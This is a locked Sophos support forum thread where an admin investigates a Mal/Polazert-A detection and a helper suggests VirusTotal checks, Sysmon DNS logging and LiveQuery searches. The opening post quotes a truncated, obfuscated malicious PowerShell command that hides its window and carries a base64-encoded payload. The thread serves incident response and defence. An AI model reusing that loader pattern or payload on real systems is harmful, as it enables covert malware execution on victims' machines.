This discussion has been locked.

You can no longer post new replies to this discussion. If you have a question you can start a new discussion

Mal/Polazert-A Removal?

I have two endpoints at two totally unrelated clients where Sophos detected Mal/Polazert-A. Sophos is good at telling me about it, but it doesn't give me any options to remove it. Every time the client reboots their computer, they get a popup from Sophos after login that Sophos found this malware. Now I am concerned it is still running somehow and our client wants to know why we aren't removing malware from their computer.

I explain that Sophos detected and terminated it, but like me, they want to know why it is still there.

How do I remove it?

Details of the infection from Sophos Central:

Path:

c:\windows\system32\windowspowershell\v1.0\powershell.exe

Name:

powershell.exe

Command line:

"PowerShell.exe" -EP byPAss -cOmMAnD "$a754ea6e8b041aa5b575492443c23=AdD-TypE -memBERDEfINITIon ('['+'d'.tOuppER()+'lL'.tolower()+'i'.Toupper()+'MpOrT('.toLOWeR()+[CHAr]0X22+'user32.DLl'.TOLoWer()+[CHar]0x22+')]PuBLIC sTATic extern BOol '.ToLOwEr()+'s'.tOupPEr()+'hOw'.ToLOWer()+'w'.TOupper()+'IndOw'.TOLoWeR()+'a'.TOupPEr()+'SYnc('.ToLower()+'i'.toUPper()+'nT'.tOLoweR()+'p'.tOUPper()+'Tr hwND, iNT NcmDSHow);'.toLOWER()) -naME ('W'.tOupPeR()+'iN32'.toLOweR()+'s'.TOUppEr()+'HoW'.TOLOwEr()+'w'.toUppeR()+'INDOW'.TOlOWeR()+'a'.tOUPPEr()+'SyNc'.TOlOWeR()) -nameSpacE WiN32FUNCTioNs -PAssThru;$a754ea6e8b041aa5b575492443c23::shoWWInDOWASYnc((gET-PROcess -id $Pid).mAiNWiNdOWHANdLE, 0);$a42b0d88df94e2b6b9453ae110cca='QHwmS1BAUnFIdEB3dChiQFZBPHJAVFEpel5uOzwzXk9+OGFeUTUrXkBSX0hGQHdKTXJeUjx6VEBWU0okQHFuJERAcW0pUUBSXyFvQHNfckxeTkYmTV5uJDZOQH04Tm9Ae1lIZV5NISlDXk07UiZeTyV5WkB7aFp4QHwmTmJeUnZDSUB1aVpLXlBHWl5AUzJCI15QckJiQH5NbyFAYHttJkB9aXVhXlBRZlVAUzQ0WEB0TTRuQHcxUFJeT3c3IV5ucm5pXlByVzhAeytXVEB2NWwwPCVeczB1I20wdGZ0I3g=';$a1bfc0

Process ID:

8456

Process executed by:

<domain>\Admin1

SHA256:

9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

Start time:

Feb 9, 2022 7:51 PM

End time:

Feb 9, 2022 7:51 PM

Duration:

7s 69ms

Actions done to this artifact:

None

Actions performed by this artifact:

162 File reads

122 Registry value sets

19 File writes

9 File deletions

2 File renames

-Mike

This thread was automatically locked due to age.

0 MJ_P1 over 2 years ago in reply to MJ_P1

I forgot to add, this one was easier to find since this PC does not have an NVIDIA video card. That entry looked wrong right as soon as I saw it.

-Mike
Cancel
Vote Up 0 Vote Down

Cancel
0 Sophos User930 over 2 years ago in reply to MJ_P1

This is great, glad you may have found a persistence entry. That is certainly the idea.

As for the MSI, I would start with uploading it to Virus Total:

VirusTotal - Home

If you can paste back the URL, I'd be interested to see the results of the vendors.

Other than that, message back if you need any further assistance. Not sure if you're able to provide the full command line argument in the PowerShell command. I'd be happy to work out what it actually did/does.
Cancel
Vote Up 0 Vote Down

Cancel
0 MJ_P1 over 2 years ago in reply to Sophos User930

One MSI: https://www.virustotal.com/gui/file/1ed9469724b3ba2891dc0efee29b1de93054601cb44aaf433c2b5860884dfa71

This one was downloaded as 'Dental-Consent-Form-For-Poor-Prognosis.msi' for one client and as 'Adult-Social-Behavior-Questionnaire.msi' for the second client.

I will work on the PowerShell command in a little bit. I really appreciate your contributions and assistance. Thank you again.

-Mike
Cancel
Vote Up 0 Vote Down

Cancel
0 Sophos User930 over 2 years ago in reply to MJ_P1

Well that's appears to be related to the file lnk file referenced, you showed in Autoruns:

ab3a7c450f6438b0df5a3a34d38c0.LNk

In the VT analysis, on the relations page we see the same file:

VirusTotal - File - 1ed9469724b3ba2891dc0efee29b1de93054601cb44aaf433c2b5860884dfa71

So that matches up.

I think it would be worth sending in the same file to SophosLabs and see what they say.

FileSubmission (sophos.com)
Cancel
Vote Up 0 Vote Down

Cancel
0 MJ_P1 over 2 years ago in reply to Sophos User930

Sophos User930 I still haven't run that PowerShell command. I am finding that task a little challenging, but I will keep trying.

I submitted the file to Sophos, who provided the following analysis:

As per the SophosLabs team, both zips contain the same sample.

_p5_1 => identity associated (New detection: Troj/PS-JV)

Decoded.bin => detected as Mal/Polazert-A

The endpoints for this client have not detected any further malicious activity, but the ATP log on the firewall continues to receive these alerts which generate emails that I investigate:

We have DNS on the firewall set to Google, which is why we see 8.8.8.8 and 8.8.4.4. Although I am unclear why we aren't seeing that come from the actual attacker.

The 192.168.25.6 address is the domain controller for our client .I have scanned this server multiple times with Sophos, Kaspersky, and SentinelOne. No malware found. Nothing suspicious in Autorun either.

Am I right to assume this is a malicious website trying to contact an endpoint inside the client network and ATP is doing its job by blocking and dropping the traffic as I instructed it to? If so, I suppose there is nothing else I can do at this point besides wait and hope they stop trying?

-Mike
Cancel
Vote Up 0 Vote Down

Cancel
0 Sophos User930 over 2 years ago in reply to MJ_P1
Hi Mike, sorry for the delay.

I see that after hitting re-analyze for that hash: 1ed9469724b3ba2891dc0efee29b1de93054601cb44aaf433c2b5860884dfa71, on Virus Total - we now have - VirusTotal - Analysing file

Sophos - Troj/Deimos-R

There are still quite a few other vendors that don't detect it, e.g. BitDefender, F-Secure, McAfee, to name a few.

I'm not sure about the DNS request/response seemingly ending up in a C2 detection.

I can understand a malicious process on a client, making a request to fdfdfdf.info for example, this would likely result in a DNS query to the local DNS server, in this case the 192.168.25.6. This isn't going to be authoritative so will forward on the query to a specified forwarder, which I could image could be Google's DNS. This results would come back into the local DNS server from Google and trigger the incoming alert on the XG.

So it does seem to suggest there is a host on the inside at least going through the resolution steps prior to making the connection of that .info domain.

I think I would start by trying to understand the client or clients looking up that domain and ideally get back to a process, can you do that from the XG logs I suspect so but I don't know the XG that well. Maybe it would be worth posting in the XG forum.

I am aware of ways at the endpoint, such as those described here in order to log processes making the connection:

Steps to enable DNS Query Logging on Windows systems (windowsreport.com)

You can enable Sysmon on the endpoints as mentioned above, you can use Sophos Central to centrally query the event logs of Sysmon. For example for Event ID 1 - Process creation the following LiveQuery would work:

SELECT --strftime('%Y-%m-%dT%H:%M:%SZ',datetime) AS Datetime, JSON_EXTRACT(data, '$.EventData.UtcTime') as UtcTime, JSON_EXTRACT(data, '$.EventData.ProcessId') as ProcessId, JSON_EXTRACT(data, '$.EventData.CommandLine') as CommandLine, JSON_EXTRACT(data, '$.EventData.User') as User, JSON_EXTRACT(data, '$.EventData.ParentProcessId') as ParentProcessId, JSON_EXTRACT(data, '$.EventData.ParentCommandLine') as ParentCommandLine, JSON_EXTRACT(data, '$.EventData.Image') as Image, JSON_EXTRACT(data, '$.EventData.FileVersion') as FileVersion, JSON_EXTRACT(data, '$.EventData.Description') as Description, JSON_EXTRACT(data, '$.EventData.Product') as Product, JSON_EXTRACT(data, '$.EventData.Company') as Company, JSON_EXTRACT(data, '$.EventData.OriginalFileName') as OriginalFileName, JSON_EXTRACT(data, '$.EventData.ProcessGuid') as ProcessGuid , JSON_EXTRACT(data, '$.EventData.CurrentDirectory') as CurrentDirectory, JSON_EXTRACT(data, '$.EventData.LogonGuid') as LogonGuid, JSON_EXTRACT(data, '$.EventData.LogonId') as LogonId, JSON_EXTRACT(data, '$.EventData.TerminalSessionId') as TerminalSessionId, JSON_EXTRACT(data, '$.EventData.IntegrityLevel') as IntegrityLevel, JSON_EXTRACT(data, '$.EventData.Hashes') as Hashes, JSON_EXTRACT(data, '$.EventData.ParentProcessGuid') as ParentProcessGuid, JSON_EXTRACT(data, '$.EventData.ParentImage') as ParentImage FROM sophos_windows_events where source = 'Microsoft-Windows-Sysmon/Operational' and eventid = 1

The same idea could be used to search for domain lookups I suppose.
Cancel
Vote Up 0 Vote Down

Cancel

0 Sophos User930 over 2 years ago in reply to Sophos User930

Just tested it by downloading Sysmon from:

Sysmon - Windows Sysinternals | Microsoft Docs

Put sysmon.exe in C:\tools\ and ran from an admin prompt:

sysmon.exe -c .\sysmon-dns.xml

Where sysmon-dns.xml is a file I created based on sysmon-config/sysmonconfig-export.xml at master · SwiftOnSecurity/sysmon-config · GitHub but just targeting the DNS section. So it's down to:

<Sysmon schemaversion="4.50">
	<HashAlgorithms>md5,sha256,IMPHASH</HashAlgorithms>  
         <EventFiltering>
		<DnsQuery onmatch="exclude">
			<!--Network noise-->
			<QueryName condition="end with">.arpa.</QueryName> <!--Design decision to not log reverse DNS lookups. You will need to decide.-->
			<QueryName condition="end with">.arpa</QueryName> <!--Design decision to not log reverse DNS lookups. You will need to decide.-->
			<QueryName condition="end with">.msftncsi.com</QueryName> <!--Microsoft proxy detection | Microsoft default exclusion-->
			<QueryName condition="is">..localmachine</QueryName>
			<QueryName condition="is">localhost</QueryName>
			<!--Microsoft-->
			<QueryName condition="end with">-pushp.svc.ms</QueryName> <!--Microsoft: Doesn't appear to host customer content or subdomains-->
			<QueryName condition="end with">.b-msedge.net</QueryName> <!--Microsoft: Doesn't appear to host customer content or subdomains-->
			<QueryName condition="end with">.bing.com</QueryName> <!-- Microsoft | Microsoft default exclusion -->
			<QueryName condition="end with">.hotmail.com</QueryName> <!--Microsoft | Microsoft default exclusion-->
			<QueryName condition="end with">.live.com</QueryName> <!--Microsoft | Microsoft default exclusion-->
			<QueryName condition="end with">.live.net</QueryName> <!--Microsoft | Microsoft default exclusion-->
			<QueryName condition="end with">.s-microsoft.com</QueryName> <!--Microsoft-->
			<QueryName condition="end with">.microsoft.com</QueryName> <!--Microsoft | Microsoft default exclusion-->
			<QueryName condition="end with">.microsoftonline.com</QueryName> <!--Microsoft | Microsoft default exclusion-->
			<QueryName condition="end with">.microsoftstore.com</QueryName> <!--Microsoft | Microsoft default exclusion-->
			<QueryName condition="end with">.ms-acdc.office.com</QueryName> <!--Microsoft: Doesn't appear to host customer content or subdomains-->
			<QueryName condition="end with">.msedge.net</QueryName> <!--Microsoft: Doesn't appear to host customer content or subdomains-->
			<QueryName condition="end with">.msn.com</QueryName> <!--Microsoft | Microsoft default exclusion-->
			<QueryName condition="end with">.msocdn.com</QueryName> <!--Microsoft-->
			<QueryName condition="end with">.skype.com</QueryName> <!--Microsoft | Microsoft default exclusion-->
			<QueryName condition="end with">.skype.net</QueryName> <!--Microsoft | Microsoft default exclusion-->
			<QueryName condition="end with">.windows.com</QueryName> <!--Microsoft-->
			<QueryName condition="end with">.windows.net.nsatc.net</QueryName> <!--Microsoft-->
			<QueryName condition="end with">.windowsupdate.com</QueryName> <!--Microsoft-->
			<QueryName condition="end with">.xboxlive.com</QueryName> <!--Microsoft-->
			<QueryName condition="is">login.windows.net</QueryName> <!--Microsoft-->
			<Image condition="begin with">C:\ProgramData\Microsoft\Windows Defender\Platform\</Image> <!--Microsoft: https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/network-protection -->
			<!--Microsoft:Office365/AzureAD-->
			<QueryName condition="end with">.activedirectory.windowsazure.com</QueryName> <!--Microsoft: AzureAD-->
			<QueryName condition="end with">.aria.microsoft.com</QueryName> <!--Microsoft: OneDrive/SharePoint-->
			<QueryName condition="end with">.msauth.net</QueryName>
			<QueryName condition="end with">.msftauth.net</QueryName>
			<QueryName condition="end with">.office.net</QueryName> <!--Microsoft: Office-->
			<QueryName condition="end with">.opinsights.azure.com</QueryName> <!--Microsoft: AzureAD/InTune client event monitoring-->
			<QueryName condition="end with">.res.office365.com</QueryName> <!--Microsoft: Office-->
			<QueryName condition="is">acdc-direct.office.com</QueryName> <!--Microsoft: Office-->
			<QueryName condition="is">atm-fp-direct.office.com</QueryName> <!--Microsoft: Office-->
			<QueryName condition="is">loki.delve.office.com</QueryName> <!--Microsoft: Office-->
			<QueryName condition="is">management.azure.com</QueryName> <!--Microsoft: AzureAD/InTune-->
			<QueryName condition="is">messaging.office.com</QueryName> <!--Microsoft: Office-->
			<QueryName condition="is">outlook.office365.com</QueryName> <!--Microsoft: Protected by HSTS-->
			<QueryName condition="is">portal.azure.com</QueryName> <!--Microsoft: AzureAD/InTune-->
			<QueryName condition="is">protection.outlook.com</QueryName> <!--Microsoft: Office-->
			<QueryName condition="is">substrate.office.com</QueryName> <!--Microsoft: Office-->
			<QueryName condition="end with">.measure.office.com</QueryName> <!--Microsoft: Office-->
			<!--3rd-party applications-->
			<QueryName condition="end with">.adobe.com</QueryName> <!--Adobe-->
			<QueryName condition="end with">.adobe.io</QueryName> <!--Adobe-->
			<QueryName condition="end with">.mozaws.net</QueryName> <!--Mozilla-->
			<QueryName condition="end with">.mozilla.com</QueryName> <!--Mozilla-->
			<QueryName condition="end with">.mozilla.net</QueryName> <!--Mozilla-->
			<QueryName condition="end with">.mozilla.org</QueryName> <!--Mozilla-->
			<QueryName condition="end with">.spotify.com</QueryName> <!--Spotify-->
			<QueryName condition="end with">.spotify.map.fastly.net</QueryName> <!--Spotify-->
			<QueryName condition="end with">.wbx2.com</QueryName> <!--Webex-->
			<QueryName condition="end with">.webex.com</QueryName> <!--Webex-->
			<QueryName condition="is">clients1.google.com</QueryName> <!--Google-->
			<QueryName condition="is">clients2.google.com</QueryName> <!--Google-->
			<QueryName condition="is">clients3.google.com</QueryName> <!--Google-->
			<QueryName condition="is">clients4.google.com</QueryName> <!--Google-->
			<QueryName condition="is">clients5.google.com</QueryName> <!--Google-->
			<QueryName condition="is">clients6.google.com</QueryName> <!--Google-->
			<QueryName condition="is">safebrowsing.googleapis.com</QueryName> <!--Google-->
			<!--Goodlist CDN-->
			<QueryName condition="end with">.akadns.net</QueryName> <!--AkamaiCDN, extensively used by Microsoft | Microsoft default exclusion-->
			<QueryName condition="end with">.netflix.com</QueryName>
			<QueryName condition="end with">aspnetcdn.com</QueryName> <!--Microsoft [ https://docs.microsoft.com/en-us/aspnet/ajax/cdn/overview ]-->
			<QueryName condition="is">ajax.googleapis.com</QueryName>
			<QueryName condition="is">cdnjs.cloudflare.com</QueryName> <!--Cloudflare: Hosts popular javascript libraries-->
			<QueryName condition="is">fonts.googleapis.com</QueryName> <!--Google fonts-->
			<QueryName condition="end with">.typekit.net</QueryName> <!--Adobe fonts-->
			<QueryName condition="is">cdnjs.cloudflare.com</QueryName>
			<QueryName condition="end with">.stackassets.com</QueryName> <!--Stack Overflow-->
			<QueryName condition="end with">.steamcontent.com</QueryName>
			<QueryName condition="is">play.google.com</QueryName>
			<QueryName condition="is">content-autofill.googleapis.com</QueryName>
			<!--Web resources-->
			<QueryName condition="end with">.disqus.com</QueryName> <!--Microsoft default exclusion-->
			<QueryName condition="end with">.fontawesome.com</QueryName>
			<QueryName condition="is">disqus.com</QueryName> <!--Microsoft default exclusion-->
			<!--Ads-->
			<QueryName condition="end with">.1rx.io</QueryName> <!--Ads-->
			<QueryName condition="end with">.2mdn.net</QueryName> <!--Ads: Google | Microsoft default exclusion-->
			<QueryName condition="end with">.3lift.com</QueryName> <!--Ads-->
			<QueryName condition="end with">.adadvisor.net</QueryName> <!--Ads: Neustar [ https://better.fyi/trackers/adadvisor.net/ ] -->
			<QueryName condition="end with">.adap.tv</QueryName> <!--Ads:AOL | Microsoft default exclusion [ https://www.crunchbase.com/organization/adap-tv ] -->
			<QueryName condition="end with">.addthis.com</QueryName> <!--Ads:Oracle | Microsoft default exclusion [ https://en.wikipedia.org/wiki/AddThis ] -->
			<QueryName condition="end with">.adform.net</QueryName> <!--Ads-->
			<QueryName condition="end with">.adnxs.com</QueryName> <!--Ads: AppNexus | Microsoft default exclusion-->
			<QueryName condition="end with">.adroll.com</QueryName> <!--Ads-->
			<QueryName condition="end with">.adrta.com</QueryName> <!--Ads-->
			<QueryName condition="end with">.adsafeprotected.com</QueryName> <!--Ads-->
			<QueryName condition="end with">.adsrvr.org</QueryName> <!--Ads-->
			<QueryName condition="end with">.adsymptotic.com</QueryName> <!--Ads-->
			<QueryName condition="end with">.advertising.com</QueryName> <!--Ads | Microsoft default exclusion-->
			<QueryName condition="end with">.agkn.com</QueryName> <!--Ads | [ https://www.home.neustar/privacy ] -->
			<QueryName condition="end with">.amazon-adsystem.com</QueryName> <!--Ads-->
			<QueryName condition="end with">.amazon-adsystem.com</QueryName> <!--Ads-->
			<QueryName condition="end with">.analytics.yahoo.com</QueryName> <!--Ads:Yahoo-->
			<QueryName condition="end with">.aol.com</QueryName> <!--Ads | Microsoft default exclusion -->
			<QueryName condition="end with">.betrad.com</QueryName> <!--Ads | Microsoft default exclusion-->
			<QueryName condition="end with">.bidswitch.net</QueryName> <!--Ads-->
			<QueryName condition="end with">.casalemedia.com</QueryName> <!--Ads | Microsoft default exclusion-->
			<QueryName condition="end with">.chartbeat.net</QueryName> <!--Ads | Microsoft default exclusion [ https://better.fyi/trackers/chartbeat.com/ ]-->
			<QueryName condition="end with">.cnn.com</QueryName> <!-- Microsoft default exclusion-->
			<QueryName condition="end with">.convertro.com</QueryName> <!--Ads:Verizon-->
			<QueryName condition="end with">.criteo.com</QueryName> <!--Ads [ https://better.fyi/trackers/criteo.com/ ] -->
			<QueryName condition="end with">.criteo.net</QueryName> <!--Ads [ https://better.fyi/trackers/criteo.com/ ] -->
			<QueryName condition="end with">.crwdcntrl.net</QueryName> <!--Ads: Lotame [ https://better.fyi/trackers/crwdcntrl.net/ ] -->
			<QueryName condition="end with">.demdex.net</QueryName> <!--Ads | Microsoft default exclusion-->
			<QueryName condition="end with">.domdex.com</QueryName>
			<QueryName condition="end with">.dotomi.com</QueryName> <!--Ads | Microsoft default exclusion-->
			<QueryName condition="end with">.doubleclick.net</QueryName> <!--Ads:Conversant | Microsoft default exclusion [ https://www.crunchbase.com/organization/dotomi ] -->
			<QueryName condition="end with">.doubleverify.com</QueryName> <!--Ads: Google-->
			<QueryName condition="end with">.emxdgt.com</QueryName> <!--Ads: EMX-->
			<QueryName condition="end with">.everesttech.net</QueryName> <!--Ads | [ https://better.fyi/trackers/everesttech.net/ ] -->
			<QueryName condition="end with">.exelator.com</QueryName> <!--Ads:Nielson Marketing Cloud-->
			<QueryName condition="end with">.google-analytics.com</QueryName> <!--Ads:Google | Microsoft default exclusion-->
			<QueryName condition="end with">.googleadservices.com</QueryName> <!--Google-->
			<QueryName condition="end with">.googlesyndication.com</QueryName> <!--Ads:Google, sometimes called during malicious ads, but not directly responsible | Microsoft default exclusion [ https://www.hackread.com/wp-content/uploads/2018/06/Bitdefender-Whitepaper-Zacinlo.pdf ]-->
			<QueryName condition="end with">.googletagmanager.com</QueryName> <!--Google-->
			<QueryName condition="end with">.googlevideo.com</QueryName> <!--Google | Microsoft default exclusion-->
			<QueryName condition="end with">.gstatic.com</QueryName> <!--Google | Microsoft default exclusion-->
			<QueryName condition="end with">.gvt1.com</QueryName> <!--Google-->
			<QueryName condition="end with">.gvt2.com</QueryName> <!--Google-->
			<QueryName condition="end with">.ib-ibi.com</QueryName> <!--Ads: Offerpath [ https://better.fyi/trackers/ib-ibi.com/ ] -->
			<QueryName condition="end with">.jivox.com</QueryName> <!--Ads-->
			<QueryName condition="end with">.krxd.net</QueryName> <!--Ads-->
			<QueryName condition="end with">.lijit.com</QueryName> <!--Ads-->
			<QueryName condition="end with">.mathtag.com</QueryName> <!--Microsoft default exclusion-->
			<QueryName condition="end with">.moatads.com</QueryName> <!--Ads | Microsoft default exclusion-->
			<QueryName condition="end with">.moatpixel.com</QueryName> <!--Ads | Microsoft default exclusion-->
			<QueryName condition="end with">.mookie1.com</QueryName> <!--Ads-->
			<QueryName condition="end with">.myvisualiq.net</QueryName> <!--Ads-->
			<QueryName condition="end with">.netmng.com</QueryName> <!--Ads-->
			<QueryName condition="end with">.nexac.com</QueryName> <!--Ads | Microsoft default exclusion-->
			<QueryName condition="end with">.openx.net</QueryName> <!--Ads-->
			<QueryName condition="end with">.optimizely.com</QueryName> <!--Ads-->
			<QueryName condition="end with">.outbrain.com</QueryName> <!--Ads-->
			<QueryName condition="end with">.pardot.com</QueryName> <!--Ads-->
			<QueryName condition="end with">.phx.gbl</QueryName> <!--Ads | Microsoft default exclusion-->
			<QueryName condition="end with">.pinterest.com</QueryName> <!--Pinerest-->
			<QueryName condition="end with">.pubmatic.com</QueryName> <!--Ads | Microsoft default exclusion-->
			<QueryName condition="end with">.quantcount.com</QueryName>
			<QueryName condition="end with">.quantserve.com</QueryName>
			<QueryName condition="end with">.revsci.net</QueryName> <!--Ads:Omniture | Microsoft default exclusion-->
			<QueryName condition="end with">.rfihub.net</QueryName> <!--Ads | Microsoft default exclusion-->
			<QueryName condition="end with">.rlcdn.com</QueryName> <!--Ads: Rapleaf [ https://better.fyi/trackers/rlcdn.com/ ] -->
			<QueryName condition="end with">.rubiconproject.com</QueryName> <!--Ads: Rubicon Project | Microsoft default exclusion [ https://better.fyi/trackers/rubiconproject.com/ ] -->
			<QueryName condition="end with">.scdn.co</QueryName> <!--Spotify-->
			<QueryName condition="end with">.scorecardresearch.com</QueryName> <!--Ads: Comscore | Microsoft default exclusion-->
			<QueryName condition="end with">.serving-sys.com</QueryName> <!--Ads | Microsoft default exclusion-->
			<QueryName condition="end with">.sharethrough.com</QueryName> <!--Ads-->
			<QueryName condition="end with">.simpli.fi</QueryName>
			<QueryName condition="end with">.sitescout.com</QueryName> <!--Ads-->
			<QueryName condition="end with">.smartadserver.com</QueryName> <!--Ads-->
			<QueryName condition="end with">.snapads.com</QueryName> <!--Ads-->
			<QueryName condition="end with">.spotxchange.com</QueryName> <!--Ads-->
			<QueryName condition="end with">.taboola.com</QueryName> <!--Ads:Taboola-->
			<QueryName condition="end with">.taboola.map.fastly.net</QueryName> <!--Ads:Taboola-->
			<QueryName condition="end with">.tapad.com</QueryName>
			<QueryName condition="end with">.tidaltv.com</QueryName> <!--Ads: Videology [ https://better.fyi/trackers/tidaltv.com/ ] -->
			<QueryName condition="end with">.trafficmanager.net</QueryName> <!--Ads | Microsoft default exclusion-->
			<QueryName condition="end with">.tremorhub.com</QueryName> <!--Ads-->
			<QueryName condition="end with">.tribalfusion.com</QueryName> <!--Ads: Exponential [ https://better.fyi/trackers/tribalfusion.com/ ] -->
			<QueryName condition="end with">.turn.com</QueryName> <!--Ads | Microsoft default exclusion [ https://better.fyi/trackers/turn.com/ ] -->
			<QueryName condition="end with">.twimg.com</QueryName> <!--Ads | Microsoft default exclusion-->
			<QueryName condition="end with">.tynt.com</QueryName> <!--Ads-->
			<QueryName condition="end with">.w55c.net</QueryName> <!--Ads:dataxu-->
			<QueryName condition="end with">.ytimg.com</QueryName> <!--Google-->
			<QueryName condition="end with">.zorosrv.com</QueryName> <!--Ads:Taboola-->
			<QueryName condition="is">1rx.io</QueryName> <!--Ads-->
			<QueryName condition="is">adservice.google.com</QueryName> <!--Google-->
			<QueryName condition="is">ampcid.google.com</QueryName> <!--Google-->
			<QueryName condition="is">clientservices.googleapis.com</QueryName> <!--Google-->
			<QueryName condition="is">googleadapis.l.google.com</QueryName> <!--Google-->
			<QueryName condition="is">imasdk.googleapis.com</QueryName> <!--Google [ https://developers.google.com/interactive-media-ads/docs/sdks/html5/ ] -->
			<QueryName condition="is">l.google.com</QueryName> <!--Google-->
			<QueryName condition="is">ml314.com</QueryName> <!--Ads-->
			<QueryName condition="is">mtalk.google.com</QueryName> <!--Google-->
			<QueryName condition="is">update.googleapis.com</QueryName> <!--Google-->
			<QueryName condition="is">www.googletagservices.com</QueryName> <!--Google-->
			<!--SocialNet-->
			<QueryName condition="end with">.pscp.tv</QueryName> <!--Twitter:Periscope-->
			<!--OSCP/CRL Common-->
			<QueryName condition="end with">.amazontrust.com</QueryName>
			<QueryName condition="end with">.digicert.com</QueryName>
			<QueryName condition="end with">.globalsign.com</QueryName>
			<QueryName condition="end with">.globalsign.net</QueryName>
			<QueryName condition="end with">.intel.com</QueryName>
			<QueryName condition="end with">.symcb.com</QueryName> <!--Digicert-->
			<QueryName condition="end with">.symcd.com</QueryName> <!--Digicert-->
			<QueryName condition="end with">.thawte.com</QueryName>
			<QueryName condition="end with">.usertrust.com</QueryName>
			<QueryName condition="end with">.verisign.com</QueryName>
			<QueryName condition="end with">ocsp.identrust.com</QueryName>
			<QueryName condition="end with">pki.goog</QueryName>
			<QueryName condition="is">msocsp.com</QueryName> <!--Microsoft:OCSP-->
			<QueryName condition="is">ocsp.comodoca.com</QueryName>
			<QueryName condition="is">ocsp.entrust.net</QueryName>
			<QueryName condition="is">ocsp.godaddy.com</QueryName>
			<QueryName condition="is">ocsp.int-x3.letsencrypt.org</QueryName>
			<QueryName condition="is">ocsp.msocsp.com</QueryName> <!--Microsoft:OCSP-->
			<QueryName condition="end with">pki.goog</QueryName>
			<QueryName condition="is">ocsp.godaddy.com</QueryName>
			<QueryName condition="end with">amazontrust.com</QueryName>
			<QueryName condition="is">ocsp.sectigo.com</QueryName>
			<QueryName condition="is">pki-goog.l.google.com</QueryName>
			<QueryName condition="end with">.usertrust.com</QueryName>
			<QueryName condition="is">ocsp.comodoca.com</QueryName>
			<QueryName condition="is">ocsp.verisign.com</QueryName>
			<QueryName condition="is">ocsp.entrust.net</QueryName>
			<QueryName condition="end with">ocsp.identrust.com</QueryName>
			<QueryName condition="is">status.rapidssl.com</QueryName>
			<QueryName condition="is">status.thawte.com</QueryName>
			<QueryName condition="is">ocsp.int-x3.letsencrypt.org</QueryName>
		</DnsQuery>


	</EventFiltering>
</Sysmon>

Waited for the computer to generate some data for this in the Sysmon Event log, then in Sophos Central, create a new Live Query with the following:

SELECT
--strftime('%Y-%m-%dT%H:%M:%SZ',datetime) AS Datetime,
JSON_EXTRACT(data, '$.EventData.UtcTime') as UtcTime,
JSON_EXTRACT(data, '$.EventData.ProcessId') as ProcessId,
JSON_EXTRACT(data, '$.EventData.QueryName') as QueryName,
JSON_EXTRACT(data, '$.EventData.QueryStatus') as QueryStatus,
JSON_EXTRACT(data, '$.EventData.QueryResults') as QueryResults,
JSON_EXTRACT(data, '$.EventData.Image') as Image,
JSON_EXTRACT(data, '$.EventData.User') as User
FROM
sophos_windows_events where source = 'Microsoft-Windows-Sysmon/Operational'
and eventid = 22

This created a report of the data.

So for a given address, you could either filter for it in the Symon config or filter for it in the LiveQuery query,

E.g. With an added clause in the filter for processes that have made a DNS request for "adservice.google.com" shows MsEdge.exe performed 2 queries for this domain.

0 MJ_P1 over 2 years ago in reply to Sophos User930

Sophos User930

I haven't been able to get Sysmon installed and configured for this office endpoints, but I did notice there is a DNS Client log built into Windows by default now, Microsoft-Windows-DNS-Client/Operational.

I tired enabling that on some PC's and running a variation of the query above, but it always shows me no results. Intercept X and Kaspersky show no infections on any PC in the office.

They have two WiFi SSID's running both from the APX320 and the XG115. Guest is set up as 'Separate Zone' and Private is set up as 'Bridge to AP LAN'.

DNS on the XG115 is set to Google. Could it be that perhaps someone on the WiFi has an infected device that is creating this traffic? The traffic is still the same as it was in my screenshot a couple weeks ago. It's not everyday, just during the week, during business hours. All office PC's stay on and connected to the internet.

-Mike
Cancel
Vote Up 0 Vote Down

Cancel
0 Sophos User930 over 2 years ago in reply to MJ_P1
The following Live Query query, having enabled the built in operation event log: "Microsoft-Windows-DNS-Client/Operational" works OK.

I have created a string variable called domain, in this example to make editing the domain "external" to the query:

SELECT datetime, JSON_EXTRACT(data, '$.EventData.QueryName') as QueryName, JSON_EXTRACT(data, '$.EventData.QueryType') as QueryType, JSON_EXTRACT(data, '$.EventData.DnsServerIpAddress') as DnsServerIpAddress, JSON_EXTRACT(data, '$.EventData.ClientPID') as ClientPID FROM sophos_windows_events where source = 'Microsoft-Windows-DNS-Client/Operational' and eventid = 3010 and QueryName like '$$domain$$'

This does give a PID but the benefit of Sysmon being it also provides the process. That said, if you're initially just interested in the domain.

I suspect if an application used sockets to construct it's own DNS query rather than using a DNS API then the windows DNS resolver wouldn't see it.

It might be worth you creating a new post in the XG part of the forum. The people there might be better placed to respond on how to approach such alerts.

Thanks.
Cancel
Vote Up 0 Vote Down

Cancel
0 MJ_P1 over 2 years ago in reply to Sophos User930

Hi Sophos User930

I was finally able to visit this again. I can't get Sysmon to work. I ran the query you posted, it worked!

I think the Sysmon tool would be much better. Do you think we could work together to get my Sysmon working please?

-Mike
Cancel
Vote Up 0 Vote Down

Cancel